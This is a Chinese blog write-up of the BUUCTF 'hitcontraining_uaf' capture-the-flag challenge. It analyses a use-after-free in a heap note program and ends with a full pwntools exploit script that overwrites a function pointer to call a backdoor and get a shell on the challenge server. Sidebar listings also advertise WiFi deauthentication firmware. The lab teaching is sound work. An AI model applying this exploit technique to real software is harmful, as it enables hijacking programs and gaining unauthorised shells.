[BUUCTF]PWN——hitcontraining_uaf

最新推荐文章于 2024-03-08 21:05:14 发布
最新推荐文章于 2024-03-08 21:05:14 发布
阅读量1.5k 收藏 5
点赞数 4
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/108454183
版权

[BUUCTF]——hitcontraining_uaf

附件

步骤:
例行检查,32位,开启了nx保护
在这里插入图片描述
试运行一下程序,非常常见的创建堆块的菜单
在这里插入图片描述
32位ida载入分析,shift+f12查看程序里的字符串,发现了/bin/sh,ctrl+x,跟进找到了后面函数,shell_addr=0x8048945
在这里插入图片描述
堆的main函数很简单,逻辑很简单,也没什么好说的,直接看菜单的各个选项

add,可以发现创建了两个chunk,第一个chunk是默认的,存放puts函数,我们可以控制第二个chunk
在这里插入图片描述

add(16,'aaa')
gdb.attach(r)

执行一次add,跟我们ida分析的一样,创建了两个堆块,而且我们修改的是第二个堆块的内容
在这里插入图片描述

delete,它只释放掉了堆块里的内容,但是没有将指针置0,存在uaf漏洞
在这里插入图片描述
printf
在这里插入图片描述
用printf打印一个堆块看一下内容,可以看到打印出了add创建的第二个chunk里的值
在这里插入图片描述

利用过程

add(48,'aaaa')
add(48,'bbbb')
gdb.attach(r)

堆的调试注意一下bk链接的地址
我们首先来调用两次add来创建堆,(实际上创建了4个堆),看一下add的两块堆的情况
在这里插入图片描述

释放掉两个来看一下

delete(0)
delete(1)

在这里插入图片描述
我们再申请一个8字节的chunk,写入shell_addr,看一下堆块的情况

add(8,p32(shell_addr))

在这里插入图片描述
可以看到我们新建的chunk由0x8516048和0x8516010构成,我们现在进行printf的话就会跳转到后门函数,就获取了shell

EXP

from pwn import*

r=remote('node3.buuoj.cn',28237)
#r=process('./hacknote')

def add(size,content):
  r.sendlineafter('choice :','1')
  r.sendlineafter('Note size :',str(size))
  r.sendlineafter('Content :',content)

def delete(idx):
  r.sendlineafter('choice :','2')
  r.sendlineafter('Index :',str(idx))

def printf(idx):
  r.sendlineafter('choice :','3')
  r.sendlineafter('Index :',str(idx))

shell_addr=0x8048945

add(48,'aaaa')
add(48,'bbbb')
#gdb.attach(r)
delete(0)
delete(1)
add(8,p32(shell_addr))
printf(0)

r.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF hitcontraining_uaf
BengDouLove的博客
04-09 910
这是我第一次自己做出来的堆题,,????动 没什么特别,,看一看代码 还是一个堆块管理系统,不过这次他管理的时候有些不一样 1.add 不一样就在这里,,如果要创建一个用户数据,,先malloc一个八字节的指针堆块(我这么叫。。里面放着指针),,这八字节,前四个字节是一个pirnt_note_content函数,,这个函数的作用是以他后面相邻四个字节的数据为指针,打印这个指针里面的内容;;;申请...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
[CTF]PWN--堆--UAF漏洞
最新发布
2301_79880752的博客
03-08 882
UAF即Use After Free简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况。。而我们一般所指的漏洞主要是后两种。此外,
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
pwnhitcontraining_uaf --堆利用之uaf
question55的博客
01-12 385
a。
hitcontraining_uaf
m0_62326489的博客
07-11 249
题目的一点自己理解
buuctf hitcontraining_uaf
cainiao78777的博客
04-12 212
会把指针堆块1重新分配给我们,context堆块会把指针堆块0分配给我们(因为我们申请一个堆块实际上是申请两个堆块(一个指针堆块,一个context堆块))程序是先申请一个指针堆块,这个指针堆块的大小为8字节,前四字节存储的是puts函数的指针,后四字节存储的是要申请的堆块内容指针就是相当于这样。3.打印堆块内容,这段代码会把指针堆块的第一个指针来执行函数,如果把第一个指针修改为后门函数指针,就能getshell。2.释放堆块,这个操作,在释放堆块之后,并未把指针置零,所以存在uaf漏洞。
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
BUUCTF-pwn-hitcontraining_uaf(UAF)
半岛铁盒的博客
06-05 292
这道题可以用来当做堆的入门题来做 开了NX 这是堆的菜单;
hitcontraining_uaf【write up】
m0_73756460的博客
01-25 108
buu刷题hitcontraining_uaf【write up】
hitcontrainingUAF之我见
TedLau的博客
06-16 262
hictontrainingUAF,太菜学了几天才懂这里的门道。我觉得我理解了这个题...继续学吧!
[BUUCTF-pwn]——hitcontraining_uaf
Y_peak的博客
03-10 308
[BUUCTF-pwn]——hitcontraining_uaf 题目地址:https://buuoj.cn/challenges#hitcontraining_uaf 题目给了提示,一个利用UAF漏洞的题目 还是先checksec一下 在IDA中,三个比较关键的函数 我们可以发现add会申请两次内存,第一次申请8个字节,前四个字节指向print_note_content这个函数, 后四个字节指向我们写入的字符串(count会加1) delete则会将刚才申请的两块空间给删除(count不会减一
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值